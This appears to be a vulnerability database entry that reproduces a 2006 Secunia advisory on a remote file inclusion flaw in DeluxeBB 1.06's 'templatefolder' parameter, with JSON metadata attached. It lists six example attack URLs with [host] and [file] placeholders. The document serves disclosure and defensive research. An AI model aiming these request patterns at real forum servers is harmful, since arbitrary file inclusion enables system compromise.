Search...

DeluxeBB 1.06 - templatefolder Remote File Inclusion

2006-06-15T00:00:00

ID EXPLOITPACK:A15A05575384A46F6AF2655165705498
Type exploitpack
Reporter Andreas Sandblad
Modified 2006-06-15T00:00:00

Description

DeluxeBB 1.06 - templatefolder Remote File Inclusion

                                        
                                            Secunia Research has discovered some vulnerabilities in DeluxeBB,
which can be exploited by malicious people to conduct SQL injection
attacks and compromise a vulnerable system.

1) Input passed to the "templatefolder" parameter in various scripts
isn't properly verified, before it is used to include files. This can
be exploited to include arbitrary files from external and local
resources.

Examples:
http://[host]/templates/deluxe/postreply.php?templatefolder=[file]
http://[host]/templates/deluxe/posting.php?templatefolder=[file]
http://[host]/templates/deluxe/pm/newpm.php?templatefolder=[file]
http://[host]/templates/default/postreply.php?templatefolder=[file]
http://[host]/templates/default/posting.php?templatefolder=[file]
http://[host]/templates/default/pm/newpm.php?templatefolder=[file]

# milw0rm.com [2006-06-15]

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:04:12", "references": [], "description": "\nDeluxeBB 1.06 - templatefolder Remote File Inclusion", "edition": 1, "reporter": "Andreas Sandblad", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2006-06-15T00:00:00", "title": "DeluxeBB 1.06 - templatefolder Remote File Inclusion", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": -0.1, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": -0.1}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2006-06-15T00:00:00", "id": "EXPLOITPACK:A15A05575384A46F6AF2655165705498", "href": "", "viewCount": 2, "sourceData": "Secunia Research has discovered some vulnerabilities in DeluxeBB,\nwhich can be exploited by malicious people to conduct SQL injection\nattacks and compromise a vulnerable system.\n\n1) Input passed to the \"templatefolder\" parameter in various scripts\nisn't properly verified, before it is used to include files. This can\nbe exploited to include arbitrary files from external and local\nresources.\n\nExamples:\nhttp://[host]/templates/deluxe/postreply.php?templatefolder=[file]\nhttp://[host]/templates/deluxe/posting.php?templatefolder=[file]\nhttp://[host]/templates/deluxe/pm/newpm.php?templatefolder=[file]\nhttp://[host]/templates/default/postreply.php?templatefolder=[file]\nhttp://[host]/templates/default/posting.php?templatefolder=[file]\nhttp://[host]/templates/default/pm/newpm.php?templatefolder=[file]\n\n# milw0rm.com [2006-06-15]", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645483920}}